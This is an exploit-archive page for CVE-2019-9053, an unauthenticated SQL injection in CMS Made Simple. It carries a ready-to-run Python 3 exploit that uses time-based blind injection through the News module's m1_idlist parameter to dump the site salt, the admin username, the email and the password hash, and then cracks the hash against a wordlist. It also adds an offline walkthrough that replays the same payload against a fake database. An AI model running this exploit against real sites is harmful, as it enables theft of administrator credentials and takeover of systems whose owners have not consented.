Related vulnerability
Title: CMS Made Simple SQL injection vulnerability (CVE-2019-9053). Description: CMS Made Simple (CMSMS) is an open-source content management system from the CMSMS team. It provides role-based permission management, wizard-based installation and upgrades, and smart caching. CMSMS 2.2.8 contains a SQL injection vulnerability: the database-backed application does not validate external input before it is used in a SQL statement, so an attacker can execute arbitrary SQL commands through it.
Description
Exploits Python cve-2019-9053 - by HackHeart
Introduction
# -exploit-lab
Exploits Python cve-2019-9053 - by HackHeart
🧠 Code Review & Porting - Python 2 → Python 3
This exploit was originally written in Python 2, which is end-of-life and no longer shipped by modern systems. To keep the tool usable, the whole script was reviewed and migrated to Python 3.
🔧 Key improvements during the port:
- Updated print statements to Python 3 syntax
- Replaced raw_input() with input()
- Adapted socket operations to handle bytes/str properly (.decode() added)
- Removed deprecated constructs such as xrange() and .iteritems()
- Validated script compatibility with Python 3.8+ and current Linux distributions
🛡️ This version keeps the exploit logic intact while ensuring:
- Compatibility with modern OSCP / Red Team labs
- Cleaner, safer and more readable syntax
- Ready to run in modern environments (VS Code, Kali, Parrot OS, ...)
#!/usr/bin/env python3
# CVE-2019-9053 - CMS Made Simple <= 2.2.9 - Unauthenticated SQL Injection
#
# Time-based blind injection through the News module's m1_idlist parameter.
# Every request appends one candidate character to the value being dumped and
# asks MySQL to SLEEP() only if the target column still starts with that prefix;
# a delayed response therefore confirms the character.
import requests
import time
import argparse
import hashlib

parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', required=True, help="Base target URI (e.g. http://10.10.10.100/cms)")
parser.add_argument('-w', '--wordlist', help="Wordlist for cracking admin password")
parser.add_argument('-c', '--crack', action='store_true', help="Crack password with wordlist")
args = parser.parse_args()

url_vuln = args.url.rstrip('/') + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()

# Characters tried at each position, in this order. '_' is a LIKE single-character
# wildcard, so a character that is not in this set is reported as '_'.
dictionary = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@._-$'
TIME = 1    # seconds of SLEEP(); raise it on a slow or jittery link to avoid false positives
flag = True
salt = ''
username = ''
email = ''
password_hash = ''
output = ""


def dump_field(field_name, table, column, condition):
    """Dump `column` of the row in `table` selected by `condition`, one character per round."""
    global flag
    result = ""
    ord_result = ""     # hex encoding of `result`, sent as 0x... so the payload needs no quotes
    while flag:
        flag = False
        for char in dictionary:
            temp_result = result + char
            ord_temp_result = ord_result + format(ord(char), "x")
            print(f"[*] Trying {field_name}: {temp_result}")
            # 0x<prefix>25 is '<prefix>%': SLEEP() runs only for rows whose column matches it.
            payload = f"a,b,1,5))+AND+(SELECT+SLEEP({TIME})+FROM+{table}+WHERE+{column}+LIKE+0x{ord_temp_result}25+AND+{condition})--+"
            start_time = time.time()
            # No timeout is set, so a hung connection stalls the loop; network latency
            # above TIME is also read as a hit, which is why TIME must exceed normal RTT.
            session.get(url_vuln + "&m1_idlist=" + payload)
            if time.time() - start_time >= TIME:
                # The response was delayed: this prefix is right, go one character deeper.
                result = temp_result
                ord_result = ord_temp_result
                flag = True
                break
    return result


# 0x736974656d61736b is 'sitemask', the site-wide salt CMSMS mixes into admin password hashes.
print("[+] Extracting salt...")
flag = True
salt = dump_field("salt", "cms_siteprefs", "sitepref_value", "sitepref_name+LIKE+0x736974656d61736b")
output += f"Salt: {salt}\n"

# 0x31 is '1': the first user in cms_users, normally the administrator created at install time.
print("[+] Extracting username...")
flag = True
username = dump_field("username", "cms_users", "username", "user_id+LIKE+0x31")
output += f"Username: {username}\n"

print("[+] Extracting email...")
flag = True
email = dump_field("email", "cms_users", "email", "user_id+LIKE+0x31")
output += f"Email: {email}\n"

print("[+] Extracting password hash...")
flag = True
password_hash = dump_field("password", "cms_users", "password", "user_id+LIKE+0x31")
output += f"Hash: {password_hash}\n"

# Offline crack: the stored hash is md5(salt + password), so replay that per wordlist entry.
if args.crack and args.wordlist:
    print("[+] Cracking password...")
    with open(args.wordlist, 'r', encoding='utf-8', errors='ignore') as f:
        for line in f:
            word = line.strip()
            print(f"[*] Trying password: {word}")
            if hashlib.md5((salt + word).encode()).hexdigest() == password_hash:
                output += f"[+] Password cracked: {word}\n"
                break

print("\n=== Exploit Results ===")
print(output)
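The exploit above is hard to study without a target, so here is an added, offline walkthrough of the same technique. It is example code written for this page, not code from the original page or from HackHeart's repository. It builds the exact m1_idlist payload shape the exploit sends, but hands it to a constructed in-memory oracle (FAKE_DB, SALT and every row in it are made up) that evaluates LIKE the way MySQL does, including backslash escapes and case-insensitive matching. That lets it exercise the prefix-extraction loop, show what the unescaped '_' in the dictionary does to characters outside the set, and replay the md5(salt + password) check used for cracking. The names build_payload, fake_request, like_to_regex, extract, crack and run are chosen here; the exact query the News module wraps around m1_idlist is not on this page, so the comment about the leading "a,b,1,5))" only restates what the exploit relies on.

```python
#!/usr/bin/env python3
"""Offline walkthrough of the time-based blind extraction used by the exploit above.

Added example, not code from the page or from HackHeart's repository. The payload
shape is the exploit's; the oracle, FAKE_DB, SALT and every row are constructed here.
"""
import hashlib
import re

DICTIONARY = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@._-$'
TIME = 1  # seconds of SLEEP() requested per probe

# Constructed rows standing in for cms_siteprefs / cms_users (made-up data).
SALT = "a1b2c3d4"
FAKE_DB = {
    "cms_siteprefs": [{"sitepref_name": "sitemask", "sitepref_value": SALT}],
    "cms_users": [{
        "user_id": "1",
        "username": "admin",
        "email": "ops+cms@example.com",  # '+' is deliberately not in DICTIONARY
        "password": hashlib.md5((SALT + "Secret_2019").encode()).hexdigest(),
    }],
}


def build_payload(table, column, prefix_hex, condition, delay=TIME):
    """The m1_idlist value the exploit sends: the leading 'a,b,1,5))' closes the
    parentheses the News query opens around the id list, then SLEEP() runs only for
    rows whose `column` starts with the hex-encoded prefix (trailing 25 is '%')."""
    return (f"a,b,1,5))+AND+(SELECT+SLEEP({delay})+FROM+{table}"
            f"+WHERE+{column}+LIKE+0x{prefix_hex}25+AND+{condition})--+")


_PAYLOAD_RE = re.compile(
    r"SLEEP\((\d+)\)\+FROM\+(\w+)\+WHERE\+(\w+)\+LIKE\+0x([0-9a-f]+)"
    r"\+AND\+(\w+)\+LIKE\+0x([0-9a-f]+)\)--\+$")


def like_to_regex(pattern):
    """MySQL LIKE: '%' any run, '_' any one char, backslash escapes the next char.
    Compiled case-insensitively to mirror MySQL's default *_ci collations."""
    out, i = "", 0
    while i < len(pattern):
        ch = pattern[i]
        if ch == "\\" and i + 1 < len(pattern):
            out += re.escape(pattern[i + 1])
            i += 2
            continue
        out += ".*" if ch == "%" else "." if ch == "_" else re.escape(ch)
        i += 1
    return re.compile(f"^{out}$", re.IGNORECASE | re.DOTALL)


def fake_request(payload):
    """Stand-in for session.get(): returns the seconds the 'server' would take.
    SLEEP(n) executes once per row the WHERE clause keeps; that is the delay."""
    m = _PAYLOAD_RE.search(payload)
    if not m:
        return 0.0
    delay, table, column, prefix_hex, cond_col, cond_hex = m.groups()
    col_re = like_to_regex(bytes.fromhex(prefix_hex).decode())
    cond_re = like_to_regex(bytes.fromhex(cond_hex).decode())
    hits = sum(1 for row in FAKE_DB.get(table, [])
               if col_re.match(row[column]) and cond_re.match(row[cond_col]))
    return float(delay) * hits


def extract(table, column, condition, oracle=fake_request, escape_wildcards=True):
    """The exploit's dump_field() loop: grow the known prefix one character at a time.
    With escape_wildcards=False the '_' in DICTIONARY is sent raw and matches any
    character, so anything outside DICTIONARY is silently reported as '_'; sending
    it as '\\_' makes the loop stop at that position instead."""
    result, prefix_hex = "", ""
    while True:
        for char in DICTIONARY:
            probe = "\\" + char if (escape_wildcards and char in "%_") else char
            candidate_hex = prefix_hex + probe.encode().hex()
            if oracle(build_payload(table, column, candidate_hex, condition)) >= TIME:
                result += char
                prefix_hex = candidate_hex
                break
        else:
            return result  # no candidate delayed the response: end of the value


def crack(salt, password_hash, words):
    """Replay the exploit's md5(salt + candidate) comparison over a wordlist."""
    for word in words:
        if hashlib.md5((salt + word).encode()).hexdigest() == password_hash:
            return word
    return None


def run():
    cond_admin = "user_id+LIKE+0x31"  # 0x31 == '1'
    salt = extract("cms_siteprefs", "sitepref_value",
                   "sitepref_name+LIKE+0x" + "sitemask".encode().hex())
    pw_hash = extract("cms_users", "password", cond_admin)
    return {
        "salt": salt,
        "username": extract("cms_users", "username", cond_admin),
        "email_escaped": extract("cms_users", "email", cond_admin),
        "email_raw": extract("cms_users", "email", cond_admin, escape_wildcards=False),
        "hash": pw_hash,
        "password": crack(salt, pw_hash, ["password", "admin123", "Secret_2019"]),
    }


if __name__ == "__main__":
    for key, value in run().items():
        print(f"{key}: {value}")
```

Running it prints the recovered salt, username, both email readings, the hash and the cracked password. Two consequences carry over to the real exploit: MySQL's default `_ci` collations make LIKE case-insensitive and the dictionary tries lowercase first, so a mixed-case username comes back lowercased (hex hashes and the sitemask salt are unaffected); and a character outside the dictionary either ends extraction early (escaped probe) or shows up as `_` (raw probe, which is what the exploit sends), so a short or odd-looking result deserves a second look before it is trusted.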
File snapshot
[4.0K] /data/pocs/09899c31d7e3c938326af9c8d2933276160ca66c
├── [2.6K] cve_2019_9053_python3.py
└── [3.5K] README.md
0 directories, 2 files
Notes
1. Access the original source first where possible.
2. If the source has gone offline or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.